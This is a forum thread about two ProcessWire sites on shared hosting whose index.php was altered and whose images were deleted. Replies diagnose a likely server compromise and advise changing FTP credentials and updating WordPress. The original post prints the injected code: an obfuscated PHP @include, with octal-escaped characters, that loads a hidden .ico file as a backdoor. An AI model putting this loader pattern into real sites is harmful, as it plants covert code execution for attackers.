Index.php changed and images deleted.

[buster808]

Hi,

Today both my live websites that are identical in build had there index.php changed to example below.
One of them also had lots of images deleted from asset/files deleted from folders.

Has anyone ever had an issue like this before? or any ideas of what this could be as I don't want to go through this again.

Thanks

<?php

/*dc5b4*/

 

@include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157";

 

/*dc5b4*/

 

[louisstephens]

From what I can tell, some might have gained access to your server/account . I have seen this before with wordpress sites. Has anything with your server changed lately? Also, I would check with your host to check if this is not just effecting you. Just in the short term, I would change your ftp credentials.

[teppo]

That's quite strange. Running this through decoder suggests that this include is trying to load file from /wire/modules/System/.db9f7664.ico. Is this a path that exists on your site, and if so, what's in that file?

/wire/modules/System/ is a path where SystemUpdater and SystemNotifications live, but I'm not aware of anything that should create a file like that. Combined with files suddenly being removed and this file getting modified, it doesn't sound good.

The first thing to do would be to check the server, i.e. is it possible that someone has gained illegitimate access to it. Is this a shared host, a VPS, or something else entirely? Were both sites on the same host?

I'm not aware of any security issues with ProcessWire itself, but ProcessWire isn't immune to problems caused by someone gaining access to the server, directly or through another application (such as a WordPress installation – which has actually happened before).

[buster808]

Hi,

db9f7664.ico  does not exist

I have changed ftp details and will send an email to host.

Both sites are on a shared host and does have Wordpress websites on there.

 

[louisstephens]

2 minutes ago, buster808 said:

Both sites are on a shared host and does have Wordpress websites on there.

 

Since you do have wordpress installs on the server, it wouldnt hurt to log in and check/update any passwords, make sure wordpress is updated (could help with any vulnerabilites with bug fixes etc), make sure that all themes and plugins are up to date as well.

 

[buster808]

Thanks Louis Teppo

Ive just gone through and done this. WordPress still haunting me ha

[wbmnfktr]

There are a few things that came up in my mind right now.

First I thought it looked like a failed git/SVN merge of some kind but afterwards it looked liked a failed upload from FileZilla. At least they both look pretty similar somehow.

As you stated that there are more instances of other sites and CMSs on that hosting you might want to try to set up different users for different sites. I guess you are using a US hosting company such as DreamH*st, H*stgator or Blueh*st, *2, or another 3.99/month mass-hosting ... I had several similar issues with these companies in the past - but to their rescue - they offer different users on a account to separate installations/instances of different sites.

TL;DR: what @teppo and @louisstephens say seems to be the case... someone got somehow access to that hosting. Maybe even through a nifty trick in W*rdPress.

[buster808]

I have been away for a couple of days and Filezilla was open and logged in with my laptop on sleep.

I need to be more carful

 

[wbmnfktr]

That's far from the best and ideal solution to go on vacation but did you change something within the path that @teppo mentioned?

Even if so... the index.php is still somewhere else than that path.

It's either weird or a good moment to change and set up a better and more secure environment.

[buster808]

Most certainly a good moment to create a more secure environment. Thanks